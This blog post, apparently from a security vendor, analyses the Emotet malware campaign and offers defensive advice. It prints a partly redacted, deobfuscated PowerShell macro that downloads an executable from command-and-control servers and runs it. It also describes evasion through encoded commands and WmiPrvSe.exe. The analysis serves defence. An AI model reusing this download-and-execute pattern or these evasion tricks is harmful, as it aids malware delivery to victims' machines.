Start now

The rise of Emotet

The rise of Emotet

The rise of Emotet

What is Emotet

Emotet is a multipurpose malware which is mainly distributed through spam mails. It was first spotted in 2014 and was designed to steal bank account details. Since then, there have been many different versions of the malware which include other functionalities such as malspam or delivery of other types of malware such as TrickBot or Ryuk.

Emotet is back since early September, infecting devices through botnet attacks by sending out large quantities of emails. Emotet targets everyone, although lately much activity has been detected towards countries such as Spain, Germany, Italy and England.

How Emotet works

The infection usually starts on a Microsoft Office document which initiates a macro that tries to download Emotet from compromised WordPress sites that act as Command & Control.
On the following code block you can see a deobfuscated macro:

$HVS084rA='------'; # obfuscated on purpose
$Yt3Nqui = '768'; # malware file will be named 768.exe
$zHmAqiz='------'; # obfuscated on purpose
$GpQtLHc=.('new-ob'+'je'+'ct') NeT.WebcLIent;
# Command and controls
foreach($Ej9owjPj in $t4Nj2JHD){
# downloads file from C2 and saves it as the previously defined name
$GpQtLHc."D`O`WNlOAdf`IlE"($Ej9owjPj, $FXYOYOI);
If ((.('Ge'+'t'+'-Item') $FXYOYOI)."LEn`G`Th" -ge 34897){
# Starts a process with the downloaded file

All the macros we’ve seen lately in Spain have the very same structure although in the latest payloads we noticed that the string delimiter switched from @ to *. It is important to know that the payload is encoded in base64 and it is called using the parameter -EncodedCommand from PowerShell.

From the previous block code, we can see that the PowerShell process will try to download files from the C2 defined in the variable $t4Nj2JHD and start a process with the downloaded file, which is usually executable.

In order to avoid chain-based detection, Emotet’s download process can be made with Windows Management Instrumentation Provider Host (WmiPrvSe.exe) but executing the same PowerShell encoded command.

The downloaded malicious executables are usually located at the root of the user folder with three digits names, like 768.exe at the previous block code. It is possible to also find more dropped malware in System32, SysWOW64 folders or Trickbot and other generic malwares in a new generated folder in Appdata.

How to protect yourself from Emotet

The Emotet malware campaign which is currently active has impacted many organizations and individuals, and once infected, Emotet spreads to other devices. This campaign is supported by at least two different groups and the payload is being actively updated from time to time.

In order to protect your infrastructure against those attacks you should take into consideration the following actions:

  • Actively monitor your devices with an EDR solution which monitors the usage of encoded PowerShell commands or that can block the usage of unwanted macros.
  • It may have virtual machine detection, so it is recommended to analyze the files in depth before being confident that is not malware.
  • The malware is continuously being updated so it is important to keep track of the malware behavior. Your software should be up to date with the latest patches.
  • Use strong passwords in all your systems and enforce a password policy. Once a device is infected, the malware may try to brute force other systems with a list of known passwords.
  • Block and monitor known malicious and compromised domains in your network perimeter.
  • Ensure that the final users use the lowest level of privilege.
  • Train employees against a phishing attack and how to detect it.
  • Define procedures to isolate and analyze any possibly infected device.